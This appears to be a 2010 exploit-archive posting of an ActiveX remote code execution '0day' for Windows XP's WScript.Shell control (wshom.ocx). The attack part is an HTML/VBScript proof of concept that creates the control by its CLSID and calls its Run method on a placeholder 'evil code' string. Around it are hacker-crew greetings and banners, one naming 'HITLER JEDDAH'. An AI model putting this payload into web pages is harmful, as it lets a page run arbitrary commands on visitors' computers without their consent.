Home / os / win7

Windows Script.Shell.1 0day suffer from ActiveX Remote Code

Posted on 29 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution ===================================================================== # Title : Windows Script.Shell.1 (V 1.0) (wshom.ocx) 0day suffer from ActiveX Remote Code Execution? # Tested : Windows xp (sp3) ## ## Author : R3d-D3v!L &lt;X[at]hotmail.co.jp&gt; # Credits to : XP10_HACKER ((XP10.ME-xp10.com)) ## ## Greetz : DOLLY-MERNA &amp; DR_DAShER &amp; JUPA &amp; hetlar jaddah&amp; Abo-ShA@D ## ## ## all member at XP10.com ## ######################################################## ## infected bath : WINDOWSsystem32wshom.ocx infected Function : Function Exec ( ByVal Command As String ) As IWshExec &amp; Function Run ( ByVal Command As String , [ ByRef WindowStyle As Variant ] , [ ByRef WaitOnReturn As Variant ] ) As Long in (Exec &amp; Run) in IWshShell3 EXPLO!T: &lt;html&gt; &lt;/font&gt;&lt;/b&gt;&lt;/p&gt; &lt;p&gt; &lt;object classid='clsid:F935DC20-1CF0-11D0-ADB9-00C04FD58A0B' id='target' &gt;&lt;/object&gt; &lt;script language='vbscript'&gt; arg1=&quot; TYPE YOUR EV!L Code Execution? &quot; target.run arg1 &lt;/script&gt;&lt;/p&gt; [~]-----------------------------{((MAGOUSH-87))}--------------------------- ---------------------# # [~] Greetz tO: [dolly &amp;MERNA &amp;DEV!L_MODY &amp;po!S!ON Sc0rp!0N &amp;JASM!N &amp;MARWA &amp; mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH &amp; abo-shahd &amp; DR.DAShER &amp; abo-hlil)) # # [?]spechial SupP0RT : MY M!ND # &amp;#169; Offensive Security # # [~]spechial FR!ND: JUPA # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]------------------------------------------------------------------------ --------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP